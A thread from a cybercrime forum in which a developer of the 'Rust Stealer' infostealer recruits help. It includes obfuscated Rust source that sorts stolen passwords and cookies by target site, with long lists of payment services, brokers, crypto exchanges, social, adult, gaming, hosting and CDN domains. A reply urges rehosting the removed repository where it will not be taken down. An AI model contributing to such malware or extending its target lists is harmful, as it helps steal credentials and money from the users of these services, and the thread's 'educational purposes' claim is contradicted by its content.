• XSS.stack #1 – первый литературный журнал от юзеров форума

Need help CONTRIBUTION TO RUST STEALER

Tomek

RAID-массив
Пользователь
Регистрация
30.07.2021
Сообщения
93
Реакции
60
Hello XSS uers,
I'm making this thread in order to seek help from members of this forum! As one of Rust Stealer developers, I would like to ask for small help...
Where is problem?!?, firstly I would like to clear out fact that I'm lazy cunt, secondly sine this project is fully free/non-profit, because it was made for educational purposes ONLY!!!
I want to make TAGS for Passwords and Cookies, thus I need big amount of domains with ready TAGS e.g. paypal.com -> MONEY TAG / coinbase.com -> MONEY/CRYPTO TAG etc...
I hope your understand idea! so I need sth like this in order to make our project better! Ty in advance for any contribution, for any person who is willing to help, there is award waiting!!! pic of my train! (NGL WORTH TO SEE IT!!!)

RUST STEALER THE BEST FREE RUST STEALER
https://xss.pro/threads/69584/page-46
 
Последнее редактирование:
LIST FOR RN, if anybody is interested in contribution, paste updated list below!

Код:
lazy_static! {
    pub static ref SENSITIVE: Vec<String> = vec![
        obfstr::obfstr!("panel").to_string(),
        obfstr::obfstr!("access").to_string(),
        obfstr::obfstr!("admin").to_string(),
        obfstr::obfstr!("ftp").to_string(),
        obfstr::obfstr!("gui").to_string(),
        obfstr::obfstr!("users").to_string(),
        obfstr::obfstr!("media").to_string(),
        obfstr::obfstr!("tools").to_string(),
        obfstr::obfstr!("settings").to_string(),
        obfstr::obfstr!("db").to_string(),
        obfstr::obfstr!("database").to_string(),
        obfstr::obfstr!("worker").to_string(),
        obfstr::obfstr!("employer").to_string()
    ];
}

lazy_static! {
    pub static ref MONEY: Vec<String> = vec![
        obfstr::obfstr!("paypal.com").to_string(),
        obfstr::obfstr!("skrill.com").to_string(),
        obfstr::obfstr!("cash.app").to_string(),
        obfstr::obfstr!("squareup.com").to_string(),
        obfstr::obfstr!("revolut.com").to_string(),
        obfstr::obfstr!("stripe.com").to_string(),
        obfstr::obfstr!("venmo.com").to_string(),
        obfstr::obfstr!("neteller.com").to_string(),
        obfstr::obfstr!("transferwise.com").to_string(),
        obfstr::obfstr!("payoneer.com").to_string(),
        obfstr::obfstr!("bitpay.com").to_string(),
        obfstr::obfstr!("dwolla.com").to_string(),
        obfstr::obfstr!("2checkout.com").to_string(),
        obfstr::obfstr!("braintree.com").to_string(),
        obfstr::obfstr!("paysafe.com").to_string(),
        obfstr::obfstr!("authorize.net").to_string(),
    ];
}

lazy_static! {
    pub static ref STOCK: Vec<String> = vec![
        obfstr::obfstr!("etoro.com").to_string(),
        obfstr::obfstr!("robinhood.com").to_string(),
        obfstr::obfstr!("ig.com").to_string(),
        obfstr::obfstr!("etoro.com").to_string(),
        obfstr::obfstr!("admiralmarkets.com").to_string(),
        obfstr::obfstr!("avatrade.com").to_string(),
        obfstr::obfstr!("plus500.com").to_string(),
        obfstr::obfstr!("forex.com").to_string(),
        obfstr::obfstr!("pepperstone.com").to_string(),
        obfstr::obfstr!("fxcm.com").to_string(),
        obfstr::obfstr!("cmtrading.com").to_string(),
        obfstr::obfstr!("saxomarkets.com").to_string(),
        obfstr::obfstr!("markets.com").to_string(),
        obfstr::obfstr!("cmcmarkets.com").to_string(),
        obfstr::obfstr!("dukascopy.com").to_string(),
        obfstr::obfstr!("icmarkets.com").to_string(),
        obfstr::obfstr!("fxpro.com").to_string(),
        obfstr::obfstr!("thinkmarkets.com").to_string(),
        obfstr::obfstr!("xtb.com").to_string(),
        obfstr::obfstr!("pepperstone.com").to_string(),
        obfstr::obfstr!("easymarkets.com").to_string(),
        obfstr::obfstr!("hotforex.com").to_string(),
        obfstr::obfstr!("jfdbank.com").to_string(),
        obfstr::obfstr!("exness.com").to_string(),
        obfstr::obfstr!("swissquote.com").to_string(),
        obfstr::obfstr!("octafx.com").to_string(),
        obfstr::obfstr!("activtrades.com").to_string(),
        obfstr::obfstr!("tradersway.com").to_string(),
        obfstr::obfstr!("vantagefx.com").to_string(),
        obfstr::obfstr!("alpari.com").to_string(),
        obfstr::obfstr!("fxtm.com").to_string(),
        obfstr::obfstr!("trading212.com").to_string()
    ];
}

lazy_static! {
    pub static ref CRYPTO: Vec<String> = vec![
        obfstr::obfstr!("coinbase.com").to_string(),
        obfstr::obfstr!("itrustcapital.com").to_string(),
        obfstr::obfstr!("margex.com").to_string(),
        obfstr::obfstr!("mexc.com").to_string(),
        obfstr::obfstr!("poloniex.com").to_string(),
        obfstr::obfstr!("primexbt.com").to_string(),
        obfstr::obfstr!("okx.com").to_string(),
        obfstr::obfstr!("bitrue.com").to_string(),
        obfstr::obfstr!("plisio.net").to_string(),
        obfstr::obfstr!("binance.com").to_string(),
        obfstr::obfstr!("kraken.com").to_string(),
        obfstr::obfstr!("gemini.com").to_string(),
        obfstr::obfstr!("bitstamp.net").to_string(),
        obfstr::obfstr!("bittrex.com").to_string(),
        obfstr::obfstr!("huobi.com").to_string(),
        obfstr::obfstr!("okex.com").to_string(),
        obfstr::obfstr!("uphold.com").to_string(),
        obfstr::obfstr!("cex.io").to_string(),
        obfstr::obfstr!("bitfinex.com").to_string(),
        obfstr::obfstr!("blockfi.com").to_string(),
        obfstr::obfstr!("crypto.com").to_string(),
        obfstr::obfstr!("eToro.com").to_string(),
        obfstr::obfstr!("coinmama.com").to_string(),
        obfstr::obfstr!("bitbuy.ca").to_string(),
        obfstr::obfstr!("coincheck.com").to_string(),
        obfstr::obfstr!("bitmart.com").to_string(),
        obfstr::obfstr!("gate.io").to_string(),
        obfstr::obfstr!("exmo.com").to_string(),
        obfstr::obfstr!("bitflyer.com").to_string(),
        obfstr::obfstr!("liquid.com").to_string(),
        obfstr::obfstr!("itbit.com").to_string(),
        obfstr::obfstr!("kucoin.com").to_string(),
        obfstr::obfstr!("paymium.com").to_string(),
        obfstr::obfstr!("cobinhood.com").to_string(),
        obfstr::obfstr!("lykke.com").to_string(),
        obfstr::obfstr!("gatehub.net").to_string(),
        obfstr::obfstr!("bitso.com").to_string(),
        obfstr::obfstr!("unocoin.com").to_string(),
        obfstr::obfstr!("bitbns.com").to_string(),
        obfstr::obfstr!("koinex.in").to_string(),
        obfstr::obfstr!("zebpay.com").to_string(),
        obfstr::obfstr!("coss.io").to_string(),
        obfstr::obfstr!("acx.io").to_string(),
        obfstr::obfstr!("omgfin.com").to_string(),
        obfstr::obfstr!("wazirx.com").to_string(),
        obfstr::obfstr!("luno.com").to_string(),
        obfstr::obfstr!("bit2c.co.il").to_string(),
        obfstr::obfstr!("coinsquare.com").to_string(),
        obfstr::obfstr!("independentreserve.com").to_string()
    ];
}

lazy_static! {
    pub static ref SOCIALS: Vec<String> = vec![
        obfstr::obfstr!("facebook.com").to_string(),
        obfstr::obfstr!("instagram.com").to_string(),
        obfstr::obfstr!("snapchat.com").to_string(),
        obfstr::obfstr!("discord.com").to_string(),
        obfstr::obfstr!("telegram.com").to_string(),
        obfstr::obfstr!("github.com").to_string(),
        obfstr::obfstr!("reddit.com").to_string(),
        obfstr::obfstr!("twitch.com").to_string(),
        obfstr::obfstr!("twitter.com").to_string(),
        obfstr::obfstr!("x.com").to_string(),
        obfstr::obfstr!("linkedin.com").to_string(),
        obfstr::obfstr!("tiktok.com").to_string(),
        obfstr::obfstr!("youtube.com").to_string(),
        obfstr::obfstr!("whatsapp.com").to_string(),
        obfstr::obfstr!("messenger.com").to_string(),
        obfstr::obfstr!("wechat.com").to_string(),
        obfstr::obfstr!("quora.com").to_string(),
        obfstr::obfstr!("dribbble.com").to_string(),
        obfstr::obfstr!("behance.net").to_string(),
        obfstr::obfstr!("soundcloud.com").to_string(),
        obfstr::obfstr!("medium.com").to_string()
    ];
}

lazy_static! {
    pub static ref PORN: Vec<String> = vec![
        obfstr::obfstr!("pornhubpremium.com").to_string(),
        obfstr::obfstr!("onlyfans.com").to_string(),
        obfstr::obfstr!("familystrokes.com").to_string(),
        obfstr::obfstr!("babes.com").to_string(),
        obfstr::obfstr!("vrporn.com").to_string(),
        obfstr::obfstr!("propertysex.com").to_string(),
        obfstr::obfstr!("pornpros.com").to_string(),
        obfstr::obfstr!("fakehub.com").to_string(),
        obfstr::obfstr!("pornworld.com").to_string(),
        obfstr::obfstr!("lubed.com").to_string(),
        obfstr::obfstr!("exxxtrasmall.com").to_string(),
        obfstr::obfstr!("adulttime.com").to_string(),
        obfstr::obfstr!("brazzers.com").to_string(),
        obfstr::obfstr!("bangbros.com").to_string(),
        obfstr::obfstr!("realitykings.com").to_string(),
        obfstr::obfstr!("purestaboo.com").to_string(),
        obfstr::obfstr!("girlsway.com").to_string(),
        obfstr::obfstr!("bang.com").to_string(),
        obfstr::obfstr!("letsdoeit.com").to_string(),
        obfstr::obfstr!("playboyp.com").to_string(),
        obfstr::obfstr!("wankz.com").to_string(),
        obfstr::obfstr!("babesnetwork.com").to_string(),
        obfstr::obfstr!("dorcelclub.com").to_string(),
        obfstr::obfstr!("topwebmodels.com").to_string(),
        obfstr::obfstr!("seehimfuck.com").to_string(),
        obfstr::obfstr!("digitalplayground.com").to_string(),
        obfstr::obfstr!("adultprime.com").to_string(),
        obfstr::obfstr!("extrememoviepass.com").to_string(),
        obfstr::obfstr!("newsensations.com").to_string(),
        obfstr::obfstr!("spizoo.com").to_string(),
        obfstr::obfstr!("pornprosnetwork.com").to_string(),
        obfstr::obfstr!("puba.com").to_string(),
        obfstr::obfstr!("karups.com").to_string(),
        obfstr::obfstr!("julesjordan.com").to_string(),
        obfstr::obfstr!("kink.com").to_string(),
        obfstr::obfstr!("private.com").to_string(),
        obfstr::obfstr!("famedigital.com").to_string(),
        obfstr::obfstr!("milehighmedia.com").to_string()      
    ];
}

lazy_static! {
    pub static ref GAMES: Vec<String> = vec![
        obfstr::obfstr!("steam.com").to_string(),
        obfstr::obfstr!("epicgames.com").to_string(),
        obfstr::obfstr!("g2a.com").to_string(),
        obfstr::obfstr!("ubisoftconnect.com").to_string(),
        obfstr::obfstr!("eneba.com").to_string(),
        obfstr::obfstr!("gg.deals").to_string(),
        obfstr::obfstr!("cdkeys.com").to_string(),
        obfstr::obfstr!("allkeyshop.com").to_string(),
        obfstr::obfstr!("kinguin.net").to_string(),
        obfstr::obfstr!("steampowered.com").to_string(),
        obfstr::obfstr!("dlcompare.com").to_string()
    ];
}

lazy_static! {
    pub static ref SHOP: Vec<String> = vec![
        obfstr::obfstr!("*********").to_string(),
        obfstr::obfstr!("selly.io").to_string(),
        obfstr::obfstr!("shopify.com").to_string(),
        obfstr::obfstr!("sell.app").to_string(),
        obfstr::obfstr!("sellfy.com").to_string(),
        obfstr::obfstr!("autobuy.io").to_string(),
        obfstr::obfstr!("*********").to_string(),
        obfstr::obfstr!("storez.me").to_string()
    ];
}

lazy_static! {
    pub static ref HOSTING: Vec<String> = vec![
        obfstr::obfstr!("bluehost.com").to_string(),
        obfstr::obfstr!("hostgator.com").to_string(),
        obfstr::obfstr!("siteground.com").to_string(),
        obfstr::obfstr!("a2hosting.com").to_string(),
        obfstr::obfstr!("inmotionhosting.com").to_string(),
        obfstr::obfstr!("dreamhost.com").to_string(),
        obfstr::obfstr!("hostinger.com").to_string(),
        obfstr::obfstr!("godaddy.com").to_string(),
        obfstr::obfstr!("kinsta.com").to_string(),
        obfstr::obfstr!("wpengine.com").to_string(),
        obfstr::obfstr!("greengeeks.com").to_string(),
        obfstr::obfstr!("liquidweb.com").to_string(),
        obfstr::obfstr!("ipage.com").to_string(),
        obfstr::obfstr!("fatcow.com").to_string(),
        obfstr::obfstr!("namecheap.com").to_string(),
        obfstr::obfstr!("hostwinds.com").to_string(),
        obfstr::obfstr!("digitalocean.com").to_string(),
        obfstr::obfstr!("vultr.com").to_string(),
        obfstr::obfstr!("linode.com").to_string(),
        obfstr::obfstr!("hetzner.com").to_string(),
        obfstr::obfstr!("ovhcloud.com").to_string()
    ];
}

lazy_static! {
    pub static ref CDN: Vec<String> = vec![
        obfstr::obfstr!("cloudflare.com").to_string(),
        obfstr::obfstr!("akamai.com").to_string(),
        obfstr::obfstr!("maxcdn.com").to_string(),
        obfstr::obfstr!("cloudfront.net").to_string(),
        obfstr::obfstr!("keycdn.com").to_string(),
        obfstr::obfstr!("stackpath.com").to_string(),
        obfstr::obfstr!("fastly.com").to_string(),
        obfstr::obfstr!("incapsula.com").to_string(),
        obfstr::obfstr!("sucuri.net").to_string(),
        obfstr::obfstr!("belugacdn.com").to_string(),
        obfstr::obfstr!("chinacache.com").to_string(),
        obfstr::obfstr!("section.io").to_string(),
        obfstr::obfstr!("swiftstack.com").to_string(),
        obfstr::obfstr!("highwinds.com").to_string(),
        obfstr::obfstr!("cloudinary.com").to_string(),
        obfstr::obfstr!("leaseweb.com").to_string(),
        obfstr::obfstr!("verizon.com").to_string(),
        obfstr::obfstr!("rackspace.com").to_string(),
        obfstr::obfstr!("quantil.com").to_string(),
        obfstr::obfstr!("lumen.com").to_string(),
        obfstr::obfstr!("cachefly.com").to_string(),
        obfstr::obfstr!("gcorelabs.com").to_string(),
        obfstr::obfstr!("bitgravity.com").to_string(),
        obfstr::obfstr!("medianova.com").to_string(),
        obfstr::obfstr!("level3.com").to_string(),
        obfstr::obfstr!("cdnetworks.com").to_string(),
        obfstr::obfstr!("azion.com").to_string()
    ];
}
 
Репозиторий Github теперь удален, я rusty и golang dev, возможно, я смогу помочь разработке. Может быть, лучше разместить это не на Git, а на codeberg, поскольку они его не удалят btw.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх